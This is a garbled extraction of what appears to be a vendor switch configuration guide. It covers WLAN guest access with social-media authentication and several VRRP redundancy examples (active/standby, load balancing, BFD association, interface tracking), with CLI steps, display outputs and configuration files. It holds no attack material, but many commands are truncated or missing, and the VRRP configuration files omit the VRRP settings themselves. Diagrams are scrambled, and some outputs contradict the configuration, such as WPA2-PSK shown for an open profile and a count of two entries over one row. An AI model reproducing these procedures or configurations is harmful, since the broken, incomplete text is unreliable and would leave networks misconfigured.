0 60de-4476-e360 area_1 ap-group1 10.23.100.254 AP6010DN-AGN nor 0 10S
----------------------------------------------------------------------------------
---
Total: 1
Step 6 Configure STAs to go online.
# Create the security profile wlan-security and set the security policy to open system
authentication.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security open //Set the security policy to
open.
[AC-wlan-sec-prof-wlan-security] quit
# Create the SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID name to wlan-net.

Warning: This action may cause service interruption. Continue?[Y/N]y

[AC-wlan-ssid-prof-wlan-ssid] quit
# Create the VAP profile wlan-vap, configure the service data forwarding mode and service
VLANs, and apply the security profile, SSID profile, and authentication profile to the VAP
profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding
mode to tunnel forwarding.
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //By default, the VLAN ID
is 1. Set the VLAN ID to 101.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] authentication-profile p1
[AC-wlan-vap-prof-wlan-vap] quit
# Bind the VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1
of the AP.
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0

[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
Step 7 Configure the Agile Controller and social media authentication server. For details, see Agile
Controller-Campus Product Documentation - Example for Configuring Guest Access
Using Social Media Accounts (GooglePlus, Facebook, or Twitter Accounts).
After completing the configuration, run the display vap ssid wlan-net command. If the
Status field displays ON, the VAP has been successfully created on the AP radios.
[AC-wlan-view] display vap ssid wlan-net
WID : WLAN ID
--------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID Status Auth type STA SSID
--------------------------------------------------------------------------------
0 area_1 1 1 60DE-4476-E360 ON WPA2-PSK 0 wlan-net
-------------------------------------------------------------------------------
Total: 2
Manually search for the WLAN with the SSID wlan-net. After completing the WeChat
authentication process as prompted, run the display station ssid wlan-net command on the
AC. The command output shows that the user has successfully connected to the WLAN wlan-
net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
---------------------------------------------------------------------------------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP
address
---------------------------------------------------------------------------------
e019-1dc7-1e08 0 area_1 1/1 5G 11n 46/59 -68 101
192.168.20.254
---------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1
----End

Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return
l AC configuration file
#
sysname AC
#
#
#
domain portal
#
dhcp enable
#
#
radius-server shared-key cipher %^%#v@)#XkYybF19}~4&3(rDX%va0:#G>0MDrOF^B;D+
%^%#
radius-server authentication 192.168.30.2 1812 source ip-address
192.168.30.1 weight 80
radius-server accounting 192.168.30.2 1813 source ip-address 192.168.30.1
weight 80
#
acl number 3001
rule 1 permit ip
#
acl number 6000
rule 1 permit ip destination fqdn www.googleapis.com
rule 2 permit ip destination fqdn apis.google.com
rule 3 permit ip destination fqdn connect.facebook.net
rule 4 permit ip destination fqdn api.twitter.com
rule 5 permit ip destination fqdn abs.twimg.com
rule 6 permit ip destination fqdn mobile.twitter.com
rule 7 permit ip destination fqdn twitter.com
#
free-rule acl 6000
#
server-ip 192.168.30.2
port 50200
shared-key cipher %^%#vB3l&dt|S!59SdGIdcT"mwAQ!4[#Y-#{IBGbI[l:%^%#
source-ip 192.168.30.1
#

#
aaa
domain portal
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.20.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.30.1 255.255.255.0
#
#
#
#
#
#
wlan
security-profile name wlan-security
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
regulatory-domain-profile name domain1
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
vap-profile wlan-vap wlan 1
radio 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
#
return

Typical Configuration Examples 11 Typical Reliability Configuration
11 Typical Reliability Configuration
About This Chapter
11.1 Typical VRRP Configuration

11.2 Typical BFD Configuration

11.1 Typical VRRP Configuration
11.1.1 Example for Configuring a VRRP Group in Active/Standby

Mode
VRRP Active/Standby Overview
Generally, all hosts on the same network segment have the same default route with the
gateway address as the next hop address. The hosts use the default route to send packets to the
gateway and the gateway forwards the packets to other network segments. When the gateway
fails, the hosts with the same default route cannot communicate with external networks.
Configuring multiple egress gateways is a common method to improve system reliability.
However, route selection among the gateways becomes an issue.
VRRP solves the problem. VRRP virtualizes multiple routing devices into a virtual router
without changing the networking, and uses the virtual router IP address as the default gateway
address to implement gateway backup. When the gateway becomes faulty, VRRP selects a
new gateway to transmit service traffic to ensure reliable communication.
It is recommended that you set the preemption delay of the backup in a VRRP group to 0,
configure the master in preemption mode, and set the preemption delay to be longer than 15s.
These settings allow a period of time for status synchronization between the uplink and
downlink on an unstable network. If the preceding settings are not used, two masters may
coexist and user devices may learn incorrect address of the master. As a result, traffic is
interrupted.
l Preemption mode: A backup preempts to be the master when its priority is higher than
the master.
l Non-preemption mode: As long as the master is working properly, the backup with a
higher priority cannot become the master.
Configuration Notes

uct Model
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE

As shown in Figure 11-1, HostA is dual-homed to SwitchA and SwitchB through the switch.
To ensure nonstop service transmission, a VRRP group in active/standby mode needs to be
configured on SwitchA and SwitchB.
l The host uses SwitchA as the default gateway to connect to the Internet. When SwitchA
becomes faulty, SwitchB functions as the gateway. This implements gateway backup.
l After SwitchA recovers, it preempts to be the master to transmit data after a preemption
delay of 20s.
NOTE
Figure 11-1 Networking for configuring a VRRP group in active/standby mode

VRRP VRID 1
Virtual IP Address: SwitchA
10.1.1.111 GE1/0/2 Master
GE1/0/1
10.1.1.1/24
192.168.1.1/24
GE1/0/1
GE1/0/1 192.168.1.2/24
GE1/0/3
Switch SwitchC Internet
172.16.1.1/24
HostA GE1/0/2 GE1/0/2
192.168.2.2/24
10.1.1.100/24
GE1/0/1
GE1/0/2
192.168.2.1/24
10.1.1.2/24
SwitchB
Backup
2. Configure a VRRP group on SwitchA and SwitchB. Set a higher priority for SwitchA so
that SwitchA functions as the master to forward traffic, and set the preemption delay to
20s on SwitchA. Set a lower priority for SwitchB so that SwitchB functions as the
backup.
Procedure
# Assign an IP address to each interface. SwitchA is used as an example. The configurations
of SwitchB and SwitchC are similar to the configuration of SwitchA, and are not mentioned

# Configure Layer 2 forwarding on the switch.

[Switch] vlan 100
# Configure OSPF on SwitchA, SwitchB, and SwitchC. SwitchA is used as an example. The
[SwitchA] ospf 1

# Configure VRRP group 1 on SwitchA, and set the priority of SwitchA to 120 and the
[SwitchA-Vlanif100] vrrp vrid 1 priority 120 //The default
priorith of a device in a VRRP group is 100. Change the priority of the master to
be higher than that of the backup.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //A device in a
VRRP group uses immediate preemption by default. Change the preemption delay of
the master to prevent service interruptions on an unstable network where devices
in the VRRP group preempt to be the master.
# Configure VRRP group 1 on SwitchB. SwitchB uses default value 100.


# After the configuration is complete, run the display vrrp command on SwitchA and
SwitchB. You can see that SwitchA is in Master state and SwitchB is in Backup state.
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
State : Backup
Virtual IP : 10.1.1.111
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
# Run the display ip routing-table command on SwitchA and SwitchB. The command output
shows that a direct route to the virtual IP address exists in the routing table of SwitchA and an
OSPF route to the virtual IP address exists in the routing table of SwitchB. The command
output on SwitchA and SwitchB is as follows:
------------------------------------------------------------------------------
10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif100

10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.1.1.111/32 Direct 0 0 D 127.0.0.1 Vlanif100
172.16.1.0/24 OSPF 10 2 D 192.168.1.2 Vlanif300
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif300
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif300
192.168.2.0/24 OSPF 10 2 D 10.1.1.2 Vlanif100
OSPF 10 2 D 192.168.1.2 Vlanif300
------------------------------------------------------------------------------


10.1.1.0/24 Direct 0 0 D 10.1.1.2 Vlanif100

10.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.1.1.111/32 OSPF 10 2 D 10.1.1.1 Vlanif100
172.16.1.0/24 OSPF 10 2 D 192.168.2.2 Vlanif200
192.168.1.0/24 OSPF 10 2 D 10.1.1.1 Vlanif100
OSPF 10 2 D 192.168.2.2 Vlanif200
192.168.2.0/24 Direct 0 0 D 192.168.2.1 Vlanif200
192.168.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif200
# Run the shutdown command on GE1/0/2 of SwitchA to simulate a link fault.

# Run the display vrrp command on SwitchB to view the VRRP status. The command output
shows that SwitchB is in Master state.
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:18:40

# After 20s, run the display vrrp command on SwitchA to view the VRRP status. The
command output shows that SwitchA is in Master state.
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES

Create time : 2012-01-12 20:15:46

Last change time : 2012-01-12 20:20:56
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100 300
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.1 255.255.255.0
#
#
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return

#
sysname SwitchB
#
vlan batch 100 200
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
#
#
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return


#
sysname SwitchC
#
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif400
ip address 172.16.1.1 255.255.255.0
#
#
#
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

#
sysname Switch
#
vlan batch 100
#
#
#
return
Video
Configuring VRRP

11.1.2 Example for Configuring a VRRP Group in Load Balancing

Mode
VRRP Load Balancing Overview

In load balancing mode, multiple devices transmit service traffic simultaneously. Therefore,
the load balancing mode requires two or more virtual routers. Each virtual router contains one
master and multiple backups, and the master in each virtual router can be different.
The load balancing mode differs from the active/standby mode in the following ways:
l Multiple VRRP groups need to be created, and the master in each VRRP group can be
different.
l A VRRP device can join multiple VRRP groups and has different priorities in different
VRRP groups.
Configuration Notes
l VRRP groups must use different virtual IP addresses. The virtual IP address of a VRRP
group must be on the same network segment as the IP address of the interface where the
VRRP group is configured.

uct Model
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 11-2, HostA and HostC are dual-homed to SwitchA and SwitchB through
the switch. To reduce the load of data traffic on SwitchA, HostA uses SwitchA as the default
gateway to connect to the Internet, and SwitchB functions as the backup gateway. HostC uses
SwitchB as the default gateway to connect to the Internet, and SwitchA functions as the
backup gateway. This implements load balancing.
NOTE

Figure 11-2 Networking diagram for configuring a VRRP group in load balancing mode
VRRP VRID 1 SwitchA

Virtual IP Address: VRID 1:Master
10.1.10.111 VRID 2:Backup
GE1/0/1
HostA 192.168.1.1/24
10.1.10.100/24
GE1/0/2 GE1/0/1
GE1/0/1 10.1.10.1/24 192.168.1.2/24
10.1.50.1/24
Switch GE1/0/3 Internet
SwitchC
GE1/0/2 172.16.1.1/24
GE1/0/2 10.1.10.2/24 GE1/0/2
10.1.50.2/24 192.168.2.2/24
HostC
10.1.50.100/24 GE1/0/1
192.168.2.1/24
SwitchB
VRID 1:Backup
VRID 2:Master
VRRP VRID 2
Virtual IP Address:
10.1.50.111
A VRRP group in load balancing mode is used to implement load balancing. The

2. Create VRRP groups 1 and 2 on SwitchA and SwitchB. In VRRP group 1, configure
SwitchA as the master and SwitchB as the backup. In VRRP group 2, configure SwitchB
as the master and SwitchA as the backup.
Procedure
# Assign an IP address to each interface. SwitchA is used as an example. The configurations

of SwitchB and SwitchC are similar to the configuration of SwitchA, and are not mentioned



# Configure OSPF on SwitchA, SwitchB, and SwitchC. SwitchA is used as an example. The
[SwitchA] ospf 1
# Configure VRRP group 1 on SwitchA and SwitchB, set the priority of SwitchA to 120 and
the preemption delay to 20s, and set the default priority for SwitchB.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP
group uses immediate preemption by default. Change the preemption delay of the
master to prevent service interruptions on an unstable network where devices in
the VRRP group preempt to be the master.
# Configure VRRP group 2 on SwitchA and SwitchB, set the priority of SwitchB to 120 and
the preemption delay to 20s, and set the default priority for SwitchA.
[SwitchB-Vlanif500] vrrp vrid 2 priority 120 //The default
[SwitchB-Vlanif500] vrrp vrid 2 preempt-mode timer delay 20 //A device in a VRRP


see that SwitchA is the master in VRRP group 1 and the backup in VRRP group 2.
State : Master
Virtual IP : 10.1.10.111
Master IP : 10.1.10.1
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

State : Backup
Virtual IP : 10.1.50.111
Master IP : 10.1.50.2
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
# After the configuration is complete, run the display vrrp command on SwitchB. You can
see that SwitchB is the backup in VRRP group 1 and the master in VRRP group 2.
State : Backup
Virtual IP : 10.1.10.111
Master IP : 10.1.10.1
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

State : Master
Virtual IP : 10.1.50.111
Master IP : 10.1.50.2
PriorityRun : 120

TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
----End
Configuration Files
#
sysname SwitchA
#
#
interface Vlanif100
ip address 10.1.10.1 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif500
ip address 10.1.50.1 255.255.255.0
#
#
#
ospf 1
area 0.0.0.0
network 10.1.10.0 0.0.0.255
network 10.1.50.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return

#
sysname SwitchB
#
#
interface Vlanif100
ip address 10.1.10.2 255.255.255.0
#
interface Vlanif500
ip address 10.1.50.2 255.255.255.0
#

#
#
ospf 1
area 0.0.0.0
network 10.1.10.0 0.0.0.255
network 10.1.50.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

#
sysname SwitchC
#
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif400
ip address 172.16.1.1 255.255.255.0
#
#
#
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

#
sysname Switch
#
vlan batch 100 500
#
#
#
return

11.1.3 Example for Configuring Association Between VRRP and

BFD to Implement a Rapid Active/Standby Switchover
Overview of Association Between VRRP and BFD
A VRRP group sends and receives VRRP Advertisement packets to determine the master and
backup statuses, thereby implementing redundancy. If links connected to a VRRP group fail,
VRRP Advertisement packets cannot be sent for negotiation. A backup will switch to the
master after three times the duration of the interval during which VRRP Advertisement
packets are sent. During the switchover period, service traffic is still sent to the original
master, causing user traffic loss.
BFD can rapidly detect connectivity of links and routes on the network. Association between
VRRP and BFD implements a fast active/standby switchover within 1 second. A BFD session
is set up between the master and backup and is bound to a VRRP group. BFD detects faults of
the VRRP group. When a fault occurs, BFD notifies the VRRP group of performing an active/
standby switchover, greatly reducing the service interruption time.
Configuration Notes
l Multiple VRRP groups can monitor a BFD session, and a VRRP group can monitor a
maximum of eight BFD sessions simultaneously.

uct Model
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 11-3, hosts on a LAN are dual-homed to SwitchA and SwitchB through
the switch. A VRRP group is established on SwitchA and SwitchB, and SwitchA is the
master.
When SwitchA or a link between SwitchA and SwitchB is faulty, VRRP packets are sent after
VRRP negotiation is complete. To speed up link switchovers, deploy a BFD session on the
link and associate the VRRP group with the BFD session. When the interface on the master or
the link fails, the BFD session rapidly detects the fault and notifies the VRRP group of the
fault. After receiving the notification, the VRRP group performs a rapid active/standby
switchover. The backup becomes the Master and takes over traffic. This reduces the impact of
the fault on service transmission.

NOTE
Figure 11-3 Association between VRRP and BFD to implement a rapid active/standby
switchover
V R R P V R ID 1
V ir tu a l IP A d d r e s s :
1 0 .1 .1 .3 /2 4 G E 1 /0 /1 M a s te r
V L A N IF 1 0 0 S w itc h A
1 0 .1 .1 .1 /2 4
H o s tA
G E 1 /0 /1
S w itc h In te r n e t
G E 1 /0 /2
H o s tB G E 1 /0 /1
V L A N IF 1 0 0 S w itc h B
1 0 .1 .1 .2 /2 4 B a c k u p B F D p a c k e ts
Association between VRRP and BFD is used to implement a rapid active/standby switchover.
2. Configure a VRRP group on SwitchA and SwitchB. SwitchA functions as the master, its
priority is 120, and the preemption delay is 20s. SwitchB functions as the backup and
uses the default priority.
3. Configure a static BFD session on SwitchA and SwitchB to monitor the link of the
VRRP group.
4. Configuration association between BFD and VRPP on SwitchB. When the link is faulty,
an active/standby switchover can be performed rapidly.
Procedure
# Assign an IP address to each interface. SwitchA is used as an example. The configuration of
SwitchB is similar to that of SwitchA.
[SwitchA] vlan 100

[Switch] vlan 100
# Configure OSPF between SwitchA and SwitchB. SwitchA is used as an example. The
configuration of SwitchB is similar to that of SwitchA.
[SwitchA] ospf 1

# Configure VRRP group 1 on SwitchA, and set the priority of SwitchA to 120 and the
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP
# Configure VRRP group 1 on SwitchB. SwitchB uses default value 100.

Step 3 Configure a static BFD session.

# Create a BFD session on SwitchA.
[SwitchA] bfd
[SwitchA-bfd] quit
[SwitchA] bfd atob bind peer-ip 10.1.1.2 interface vlanif 100 //Configure a
static BFD session to monitor the link of the VRRP group.
[SwitchA-bfd-session-atob] discriminator local 1
[SwitchA-bfd-session-atob] discriminator remote 2
[SwitchA-bfd-session-atob] min-rx-interval 100
[SwitchA-bfd-session-atob] min-tx-interval 100
[SwitchA-bfd-session-atob] commit
[SwitchA-bfd-session-atob] quit
# Create a BFD session on SwitchB.

[SwitchB] bfd
[SwitchB-bfd] quit
[SwitchB] bfd btoa bind peer-ip 10.1.1.1 interface vlanif 100 //Configure a
static BFD session to monitor the link of the VRRP group.
[SwitchB-bfd-session-btoa] discriminator local 2
[SwitchB-bfd-session-btoa] discriminator remote 1

[SwitchB-bfd-session-btoa] min-rx-interval 100

[SwitchB-bfd-session-btoa] min-tx-interval 100
[SwitchB-bfd-session-btoa] commit
[SwitchB-bfd-session-btoa] quit
Run the display bfd session command on SwitchA and SwitchB. You can see that the BFD
session is Up. The display on SwitchA is used as an example.
[SwitchA] display bfd session all
--------------------------------------------------------------------------------
Local Remote PeerIpAddr State Type InterfaceName
--------------------------------------------------------------------------------
1 2 10.1.1.2 Up S_IP_IF Vlanif100
--------------------------------------------------------------------------------
Step 4 Configuration association between BFD and VRPP.

# Configure association between VRRP and BFD on SwitchB. When the BFD session
becomes Down, the priority of SwitchB increases by 40.
[SwitchB-Vlanif100] vrrp vrid 1 track bfd-session 2 increased 40

# After the configuration is complete, run the display vrrp command on SwitchA and
SwitchB. SwitchA is the master, SwitchB is the backup, and the associated BFD session is in
Up state.
State : Master
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
State : Backup
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Track BFD : 2 Priority increased : 40
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

display vrrp command on SwitchA and SwitchB. You can see that SwitchA is in Initialize
state, SwitchB becomes the Master, and the associated BFD session becomes Down.

State : Initialize
Master IP : 0.0.0.0
PriorityRun : 120
MasterPriority : 0
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
State : Master
PriorityRun : 140
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
BFD-session state : DOWN
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

SwitchA restores to be the master, SwitchB restores to be the backup, and the associated BFD
session is in Up state.
State : Master
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE

Virtual MAC : 0000-5e00-0101

Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
State : Backup
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
bfd
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
#
bfd atob bind peer-ip 10.1.1.2 interface Vlanif100
min-tx-interval 100
min-rx-interval 100
commit
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return

#
sysname SwitchB
#
vlan batch 100

#
bfd
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 track bfd-session 2 increased 40
#
#
bfd btoa bind peer-ip 10.1.1.1 interface Vlanif100
min-tx-interval 100
min-rx-interval 100
commit
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return

#
sysname Switch
#
vlan batch 100
#
#
#
return
11.1.4 Example for Configuring an Eth-Trunk and Association

Between VRRP and the Interface Status
Association Between VRRP and the Interface Status

Additional technologies are required to enhance the VRRP active/standby function. For
example, when the link from the master to a network is disconnected, VRRP cannot detect the
fault and an active/standby switchover cannot be performed. As a result, hosts cannot
remotely access the network through the master. To address this issue, you can configure
association between VRRP and the interface status.
When the master detects that the uplink interface fails, the master reduces its priority to be
lower than the priority of the backup and immediately sends VRRP packets. After the backup
receives the VRRP packets, it detects that the priority in the VRRP packets is lower than its
priority and switches to the master. This ensures correct traffic forwarding.
Configuration Notes

l A VRRP group can be associated with a maximum of eight interfaces on a device.

Association between a VRRP group and the interface status cannot be configured on the
device as the IP address owner.

uct Model
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 11-4, the user hosts are dual-homed to SwitchA and SwitchB through the
switch. The requirements are as follows:
l The hosts use SwitchA as the default gateway to connect to the Internet. When SwitchA
or the downlink/uplink fails, SwitchB functions as the gateway to implement gateway
backup.
l The bandwidth of the link between SwitchA and SwitchB is increased to implement link
backup and improve link reliability.
l After SwitchA recovers, it becomes the gateway within 20s.
Figure 11-4 Networking of association between VRRP and the interface status
A g g re g a tio n la y e r C o re la y e r
S w itc h A
M a s te r
VLAN 101~ G E 1 /0 /1
G E 1 /0 /2 1 9 2 .1 6 8 .1 .1 /2 4
VLAN 116
G E 1 /0 /3 G E 1 /0 /1
G E 1 /0 /1 G E 1 /0 /4 1 9 2 .1 6 8 .1 .2 /2 4
E th -T ru n k1
G E 1 /0 /3
...
S w itc h S w itc h C In te rn e t
1 7 2 .1 6 .1 .1 /2 4
G E 1 /0 /4 G E 1 /0 /2
G E 1 /0 /2
G E 1 /0 /3 1 9 2 .1 6 8 .2 .2 /2 4
VLAN 165~ G E 1 /0 /1
VLAN 180 G E 1 /0 /2
1 9 2 .1 6 8 .2 .1 /2 4
S w itc h B
Backup


2. Configure VLAN aggregation on SwitchA and SwitchB to implement Layer 2 isolation
and Layer 3 connectivity of VLANs 101 to 180 and save IP addresses.
3. Create an Eth-Trunk on SwitchA and SwitchB and add member interfaces to the Eth-
Trunk to increase the link bandwidth and implement link backup.
4. Configure a VRRP group between SwitchA and SwitchB. Set a higher priority for
SwitchA so that SwitchA functions as the master to forward traffic, and set the
preemption delay to 20s on SwitchA. Set a lower priority for SwitchB so that SwitchB
functions as the backup.
5. Associate VRRP with GE1/0/1 and GE1/0/2 on SwitchA so that the VRRP group can
detect the fault of the master and perform an active/standby switchover immediately.
NOTE
SwitchA and SwitchB are core switches, and the switch is an aggregation switch.
Procedure
# Assign an IP address to each interface on core devices. SwitchA is used as an example. The
[SwitchA] vlan batch 11 to 15 101 to 180 301 to 305 400
# Configure Layer 2 transparent transmission on the switch.

[Switch] vlan batch 11 to 15 101 to 180


# Configure OSPF on SwitchA, SwitchB, and switch. SwitchA is used as an example. The
[SwitchA] ospf 1
Step 2 Configure a super-VLAN on SwitchA and SwitchB.
# Configure a super-VLAN on SwitchA. The configuration of SwitchB is similar to the

configuration of SwitchA, and is not mentioned here. For details, see the configuration files.
[SwitchA] vlan 11
[SwitchA] vlan 12
[SwitchA] vlan 13
[SwitchA] vlan 14
[SwitchA] vlan 15
Step 3 Configure link aggregation on the switchA and SwitchB.
# Create Eth-Trunk 1 in LACP mode on SwitchA. The configuration of SwitchB is similar to

the configuration of SwitchA, and is not mentioned here. For details, see the configuration
files.
[SwitchA-Eth-Trunk1] mode lacp
[SwitchA-Eth-Trunk1] undo port trunk allow-pass vlan 1
# Add member interfaces on SwitchA to Eth-Trunk 1. The configuration of SwitchB is similar

to the configuration of SwitchA, and is not mentioned here. For details, see the configuration
files.


Step 4 Configure VRRP groups on SwitchA and SwitchB.
# Configure a VRRP group on SwitchA, and set the priority of SwitchA to 120 and the
[SwitchA-Vlanif11] vrrp vrid 1 priority
120 //The default priority of the device
in a VRRP group is 100. Change the priority of the master to be higher than that
of the backup.
[SwitchA-Vlanif11] vrrp vrid 1 preempt-mode timer delay
20 //The device in a VRRP group uses the immediate
preemption mode by default. Change the preemption delay of the master to prevent
traffic interruptions when the master and backup frequently preempt the bandwith
on an unstable network.
100 //Associate the VRRP group with the uplink interface. Set the decreased
100 //Associate the VRRP group with the downlink interface. Set the decreased
[SwitchA-Vlanif11] vrrp advertise send-mode
301 //Specify VLAN 301 where VRRP packets
are transmitted to save the network bandwidth.
# Configure a VRRP group on SwitchB. SwitchB uses the default priority of 100.


Step 5 Enable STP on SwitchA, SwitchB, and SwitchC.

# Disable global STP on SwitchA, SwitchB, SwitchC, and Switch. SwitchA is used as an
example. The configurations of SwitchB, SwitchC, and the switch are similar to the
[SwitchA] stp disable

see that SwitchA is the master in VRRP group 1. VRRP group 1 is used as an example.
Information of other VRRP groups is similar to information of VRRP group 1.
State : Master
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
IF state : UP
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58
# Run the display vrrp command on SwitchB. You can see that SwitchB is the backup.
VRRP group 1 is used as an example.
State : Backup

PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58
display vrrp command on SwitchA and SwitchB. You can see that SwitchA is in Backup
state, SwitchB enters the Master state, and the associated interface becomes Down.
State : Backup
PriorityRun : 20
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
IF state : DOWN
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38
State : Master
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
